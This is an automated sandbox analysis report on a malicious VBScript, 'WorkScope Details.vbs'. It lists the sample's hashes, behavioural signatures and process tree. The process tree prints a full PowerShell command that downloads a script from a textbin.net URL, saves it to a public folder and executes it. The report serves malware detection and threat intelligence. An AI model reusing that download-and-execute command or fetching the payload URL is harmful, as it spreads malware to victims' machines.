Analysis

max time kernel: 43s
max time network: 46s
platform: windows7_x64
resource: win7-20220414-en
submitted: 15-04-2022 12:16

Static task: static1
Behavioral task: behavioral1
  Sample: WorkScope Details.vbs
  Resource: win7-20220414-en
General

Target: WorkScope Details.vbs
Size: 31KB
MD5: 0284695a0af70e045cf579e015ebbdf4
SHA1: f0c20148cf96f0c81463e0224d80d4c67d7c1a04
SHA256: 78a742710aa79e0574a6faefecfaf851b64043889e75768f5de091cfc5a21dc0
SHA512: 6e54499711e1a0ee1ecd4679d7584027a424ba496d0bca868cc8e8d13d47097c4f0d65c0e4277c1457371b37e0c525a8ade33860cabd4e8869a438282af89e56
Malware Config

Extracted: https://textbin.net/raw/mevlbkxshp
Signatures

Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  4     1492  powershell.exe
  5     1492  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1492  powershell.exe
  1500  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1492  powershell.exe
  Token: SeDebugPrivilege  1500  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process         procid_target
  PID 1648 wrote to memory of 1492   1648  WScript.exe     27
  PID 1648 wrote to memory of 1492   1648  WScript.exe     27
  PID 1648 wrote to memory of 1492   1648  WScript.exe     27
  PID 1492 wrote to memory of 1500   1492  powershell.exe  29
  PID 1492 wrote to memory of 1500   1492  powershell.exe  29
  PID 1492 wrote to memory of 1500   1492  powershell.exe  29
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WorkScope Details.vbs"
  PID: 1648
  Signatures:
    - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/mevlbkxshp'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\mevlbkxshp.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1'
    PID: 1492
    Signatures:
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\mevlbkxshp.PS1
      PID: 1500
      Signatures:
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 0558c637d1ab3bb3a8a6becee7a23c12
  SHA1: 0924ebf98bad2dc88b32bcba48cf8d87cb991751
  SHA256: ab4cdb449e05ab0c0d21e59239a95228b1e4ec2f76a0181c102725780b347b05
  SHA512: 955287fa6a150847464c38c59816dc830ae3878cc95c2be222ffac43cf61b282e16ad52142bb31cb55101543bec2c56451717b6e80e52738cc58b9bf69dfee8d

  Filesize: 3B
  MD5: ecaa88f7fa0bf610a5a26cf545dcd3aa
  SHA1: 57218c316b6921e2cd61027a2387edc31a2d9471
  SHA256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
  SHA512: 37c783b80b1d458b89e712c2dfe2777050eff0aefc9f6d8beedee77807d9aeb2e27d14815cf4f0229b1d36c186bb5f2b5ef55e632b108cc41e9fb964c39b42a5